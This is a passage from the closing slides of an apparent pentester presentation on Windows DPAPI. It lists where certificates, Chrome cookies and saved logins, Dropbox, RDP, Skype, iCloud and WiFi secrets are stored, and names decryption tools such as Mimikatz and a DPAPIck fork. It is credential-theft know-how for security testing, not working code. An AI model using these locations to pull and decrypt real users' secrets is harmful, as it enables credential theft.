  • %APPDATA%\Microsoft\SystemCertificates\My\Certificates\
  • %APPDATA%\Microsoft\Crypto\RSA\<SID>\
• System certificates
  • HKLM:\SOFTWARE\Microsoft\SystemCertificates\MY\Certificates\*
  • C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys\
• Chrome
  • %localappdata%\Google\Chrome\User Data\Default\Cookies
  • %localappdata%\Google\Chrome\User Data\Default\Login Data
• Dropbox
  • %LOCALAPPDATA%\Dropbox\instance1\config.dbx
  • %LOCALAPPDATA%\Dropbox\instance_db\instance.dbx
  • HKCU\SOFTWARE\Dropbox\ks
  • HKCU\SOFTWARE\Dropbox\ks1

DPAPI for pentesters – conclusions
• RDP
  • file type: *.rdg (Remote Desktop Connection Manager profiles)

• Skype
  • Account.xml

• iCloud
  • Apple's own entropy !

• WiFi keys
  • SYSTEM master keys
DPAPI for pentesters – conclusions
Our DPAPIck
• Added Win10 domain decryption (additional PBKDF2 rounds)
• Added domain RSA key decryption
• Added certificate LDAP usage
• Added DPAPI_SYSTEM support
• Other modifications
• TODO: RPC master key decryption

https://github.com/mis-team/dpapick
DPAPI for all – conclusions
• DPAPI = crypto + crypto + crypto + …
• DPAPI is built on user master keys and system master keys
• Your master keys are not only yours…
• Your certificates and files are not only yours…
• DPAPI decryption…
  • Mimikatz
  • DPAPIck
  • PowerShell
  • etc…
• DPAPI everywhere…
  • RDP profiles (.rdg)
  • Credential Vault
  • IE, Edge

Thank You !

email: [email protected]
Telegram channel: @mis_team
Github: mis-team